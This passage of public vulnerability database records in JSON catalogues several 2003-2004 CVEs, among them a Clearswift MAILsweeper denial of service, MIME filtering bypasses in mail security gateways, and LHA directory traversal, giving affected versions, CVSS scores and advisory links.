        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17336"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109521027007616\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17336"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-12-31 05:00
Modified
2024-11-20 23:53
Severity ?
Summary
Clearswift MAILsweeper for SMTP before 4.3_13 allows remote attackers to cause a denial of service (infinite loop) via an e-mail with a crafted RAR archive attached.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "EFE4FA19-F2EA-4292-A441-2E4A39366942",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "FA5D7FD1-D5AB-4987-801A-FA464C31298A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "772710C7-41FE-47E2-B0D7-A3C8D36C8808",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "7358AD98-44C1-4CC4-BD50-CFF3822F3A96",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "AAA1C283-E518-4BC6-BBF0-FCE09F9E0F17",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "5B8A74FB-07B0-42D6-ABF3-D7A073A329E3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "49668AFD-4821-4D5A-BEBD-DF55A8AB58C6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "57E0BFFD-D777-43A5-AEE8-765F55C86E93",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.6_sp1:*:*:*:*:*:*:*",
              "matchCriteriaId": "DAF9A151-6EBF-4760-A154-A34FF7C9E632",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Clearswift MAILsweeper for SMTP before 4.3_13 allows remote attackers to cause a denial of service (infinite loop) via an e-mail with a crafted RAR archive attached."
    }
  ],
  "id": "CVE-2004-2328",
  "lastModified": "2024-11-20T23:53:04.480",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-12-31T05:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://www.osvdb.org/3742"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.secunia.com/advisories/10732/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/9556"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14979"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://www.osvdb.org/3742"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch",
        "Vendor Advisory"
      ],
      "url": "http://www.secunia.com/advisories/10732/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Patch"
      ],
      "url": "http://www.securityfocus.com/bid/9556"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/14979"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2004-10-20 04:00
Modified
2024-11-20 23:47
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use non-standard separator characters, or use standard separators incorrectly, within MIME headers, fields, parameters, or values, which may be interpreted differently by mail clients.



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA12B965-672C-444D-9774-0F76FE47EA29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.8:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6C9B32C-5EC9-46BD-AA77-F414A143576C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "823C27EB-C00F-4A7E-B832-013A50A1EE2D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "BD217379-28E7-465E-843D-E7204EE0E89F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB96CB8A-59F3-4624-B2BA-687ECF929B79",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "04A02C12-547E-4086-A409-53AA68F1A4D5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:clearswift:mailsweeper:4.3.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "8185FBF2-D678-4D90-A5AC-F9B06DFED95F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "4F4EC2BB-A979-4C37-B8BB-086DAEEB4A6A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD53E1BC-6A92-4D7C-BE1F-FEF88F78DBD4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.31:*:*:*:*:*:*:*",
              "matchCriteriaId": "AC782BFC-6BA0-4823-8A6D-F7D83F55393C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:f-secure:internet_gatekeeper:6.32:*:*:*:*:*:*:*",
              "matchCriteriaId": "E1B09025-47B9-4F77-9DA6-80885E9A4EC4",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "7E021143-608B-44A2-84FB-8F8AC00A9985",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.1:*:*:*:*:*:*:*",
              "matchCriteriaId": "0A9BB1C1-2CB2-426D-A8CE-AF5CB0B98674",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "7AC4686E-B92F-47ED-90DA-42AF650521D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "80EF73F0-1FE1-4041-9C07-A89D153DA41F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.4:*:*:*:*:*:*:*",
              "matchCriteriaId": "EF45C4F8-A20C-4D7D-B203-AF36FB046C63",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.5:*:*:*:*:*:*:*",
              "matchCriteriaId": "75222D1B-1384-4C74-A54F-BC028C5CDB69",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.6:*:*:*:*:*:*:*",
              "matchCriteriaId": "A5129FD4-C011-4EA9-B8A1-256E95494FE6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.2.7:*:*:*:*:*:*:*",
              "matchCriteriaId": "8F33D78C-9CD1-49A6-A43E-D0187600C033",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.0:*:*:*:*:*:*:*",
              "matchCriteriaId": "E6D3CF1D-64E1-47DB-8767-EF8DBF4E17AE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.2:*:*:*:*:*:*:*",
              "matchCriteriaId": "9E725208-BA0C-41D9-BC45-84577A94AAA1",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:paul_l_daniels:ripmime:1.3.2.3:*:*:*:*:*:*:*",
              "matchCriteriaId": "A43C3DCC-3298-4D4D-9485-4A3BECB615E9",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use non-standard separator characters, or use standard separators incorrectly, within MIME headers, fields, parameters, or values, which may be interpreted differently by mail clients."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples productos de pasarelas de seguridad de contenidos y antivirus pueden permitir a atacantes remotos saltarse restricciones de contenido mediante mensajes MIME que usan caract\u00e9res de separaci\u00f3n no est\u00e1ndar, o usan separadores est\u00e1ndar de manera incorrecta, dentro de cabeceras, campos, par\u00e1metros o valores MIME, lo que puede ser interpretado de manera diferente por clientes de correo."
    }
  ],
  "id": "CVE-2004-0052",
  "lastModified": "2024-11-20T23:47:39.023",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": true,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ]
  },
  "published": "2004-10-20T04:00:00.000",
  "references": [
    {
      "source": "cve@mitre.org",
      "url": "http://marc.info/?l=bugtraq\u0026m=109517669115891\u0026w=2"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17334"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "http://marc.info/?l=bugtraq\u0026m=109517669115891\u0026w=2"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17334"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "NVD-CWE-Other"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

cve-2003-1016
Vulnerability from cvelistv5
Published
2004-09-24 04:00
Modified
2024-08-08 02:12
Severity ?
Summary
Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use malformed quoting in MIME headers, parameters, and values, including (1) fields that should not be quoted, (2) duplicate quotes, or (3) missing leading or trailing quote characters, which may be interpreted differently by mail clients.
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:12:35.543Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "mime-quote-filtering-bypass(17336)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17336"
          },
          {
            "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME field quoting issue",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=109521027007616\u0026w=2"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-09-14T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use malformed quoting in MIME headers, parameters, and values, including (1) fields that should not be quoted, (2) duplicate quotes, or (3) missing leading or trailing quote characters, which may be interpreted differently by mail clients."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-10T14:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "mime-quote-filtering-bypass(17336)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17336"
        },
        {
          "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME field quoting issue",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=109521027007616\u0026w=2"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-1016",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple content security gateway and antivirus products allow remote attackers to bypass content restrictions via MIME messages that use malformed quoting in MIME headers, parameters, and values, including (1) fields that should not be quoted, (2) duplicate quotes, or (3) missing leading or trailing quote characters, which may be interpreted differently by mail clients."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "mime-quote-filtering-bypass(17336)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/17336"
            },
            {
              "name": "20040914 Corsaire Security Advisory - Multiple vendor MIME field quoting issue",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=109521027007616\u0026w=2"
            },
            {
              "name": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm",
              "refsource": "MISC",
              "url": "http://www.uniras.gov.uk/vuls/2004/380375/mime.htm"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-1016",
    "datePublished": "2004-09-24T04:00:00",
    "dateReserved": "2003-12-17T00:00:00",
    "dateUpdated": "2024-08-08T02:12:35.543Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2003-1485
Vulnerability from cvelistv5
Published
2007-10-24 23:00
Modified
2024-09-17 02:31
Severity ?
Summary
Clearswift MAILsweeper 4.0 through 4.3.7 allows remote attackers to bypass filtering via a file attachment that contains "multiple extensions combined with large blocks of white space."
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:28:03.650Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://www.clearswift.com/download/bin/Patches/ReadMe_SMTP_438.htm"
          },
          {
            "name": "7568",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/7568"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Clearswift MAILsweeper 4.0 through 4.3.7 allows remote attackers to bypass filtering via a file attachment that contains \"multiple extensions combined with large blocks of white space.\""
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2007-10-24T23:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://www.clearswift.com/download/bin/Patches/ReadMe_SMTP_438.htm"
        },
        {
          "name": "7568",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/7568"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-1485",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Clearswift MAILsweeper 4.0 through 4.3.7 allows remote attackers to bypass filtering via a file attachment that contains \"multiple extensions combined with large blocks of white space.\""
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.clearswift.com/download/bin/Patches/ReadMe_SMTP_438.htm",
              "refsource": "CONFIRM",
              "url": "http://www.clearswift.com/download/bin/Patches/ReadMe_SMTP_438.htm"
            },
            {
              "name": "7568",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/7568"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-1485",
    "datePublished": "2007-10-24T23:00:00Z",
    "dateReserved": "2007-10-24T00:00:00Z",
    "dateUpdated": "2024-09-17T02:31:17.129Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2004-0235
Vulnerability from cvelistv5
Published
2004-05-05 04:00
Modified
2024-08-08 00:10
Severity ?
Summary
Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes ("//absolute/path").
Impacted products
Vendor Product Version
n/a n/a Version: n/a
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T00:10:03.724Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "CLA-2004:840",
            "tags": [
              "vendor-advisory",
              "x_refsource_CONECTIVA",
              "x_transferred"
            ],
            "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
          },
          {
            "name": "FEDORA-2004-119",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
          },
          {
            "name": "10243",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/10243"
          },
          {
            "name": "20040501 LHa buffer overflows and directory traversal problems",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
          },
          {
            "name": "lha-directory-traversal(16013)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
          },
          {
            "name": "RHSA-2004:179",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
          },
          {
            "name": "FLSA:1833",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
          },
          {
            "name": "DSA-515",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2004/dsa-515"
          },
          {
            "name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
          },
          {
            "name": "GLSA-200405-02",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
          },
          {
            "name": "RHSA-2004:178",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
          },
          {
            "name": "oval:org.mitre.oval:def:978",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A978"
          },
          {
            "name": "oval:org.mitre.oval:def:10409",
            "tags": [
              "vdb-entry",
              "signature",
              "x_refsource_OVAL",
              "x_transferred"
            ],
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10409"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2004-04-30T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple directory traversal vulnerabilities in LHA 1.14 allow remote attackers or local users to create arbitrary files via an LHA archive containing filenames with (1) .. sequences or (2) absolute pathnames with double leading slashes (\"//absolute/path\")."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-10-10T00:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "CLA-2004:840",
          "tags": [
            "vendor-advisory",
            "x_refsource_CONECTIVA"
          ],
          "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000840"
        },
        {
          "name": "FEDORA-2004-119",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://www.redhat.com/archives/fedora-announce-list/2004-May/msg00005.html"
        },
        {
          "name": "10243",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/10243"
        },
        {
          "name": "20040501 LHa buffer overflows and directory traversal problems",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2004-May/020776.html"
        },
        {
          "name": "lha-directory-traversal(16013)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16013"
        },
        {
          "name": "RHSA-2004:179",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2004-179.html"
        },
        {
          "name": "FLSA:1833",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://bugzilla.fedora.us/show_bug.cgi?id=1833"
        },
        {
          "name": "DSA-515",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2004/dsa-515"
        },
        {
          "name": "20040510 [Ulf Harnhammar]: LHA Advisory + Patch",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=108422737918885\u0026w=2"
        },
        {
          "name": "GLSA-200405-02",
          "tags": [
            "vendor-advisory",
            "x_refsource_GENTOO"
          ],
          "url": "http://security.gentoo.org/glsa/glsa-200405-02.xml"
        },
        {
          "name": "RHSA-2004:178",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "http://www.redhat.com/support/errata/RHSA-2004-178.html"
        },
        {
          "name": "oval:org.mitre.oval:def:978",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A978"
        },
        {
          "name": "oval:org.mitre.oval:def:10409",
          "tags": [
            "vdb-entry",
            "signature",
            "x_refsource_OVAL"
          ],
          "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10409"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2004-0235",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
